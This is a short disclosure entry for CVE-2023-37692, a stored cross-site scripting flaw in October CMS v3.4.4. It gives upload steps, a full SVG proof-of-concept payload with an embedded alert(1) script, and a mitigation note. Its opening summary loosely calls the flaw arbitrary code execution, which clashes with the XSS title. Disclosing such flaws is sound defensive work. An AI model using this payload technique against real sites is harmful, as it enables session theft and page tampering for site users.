Headline
CVE-2023-37692: October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)
An arbitrary file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code via a crafted file.
#Exploit Title: October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE: 2023-37692
#Proof of Concept:
1-) Install the system through the website and log in with any user with file upload authority.
2-) Click on the Media menu at the top.
3-) Create an SVG file using the payload below.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>
4-) The XSS payload will be triggered when you call the corresponding SVG file.
NOTE: This security vulnerability may continue in other versions. It is recommended to disable the SVG extension for this.
Related news
An svg file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code in the context of a browser via a crafted svg file. Attackers must be authenticated as users.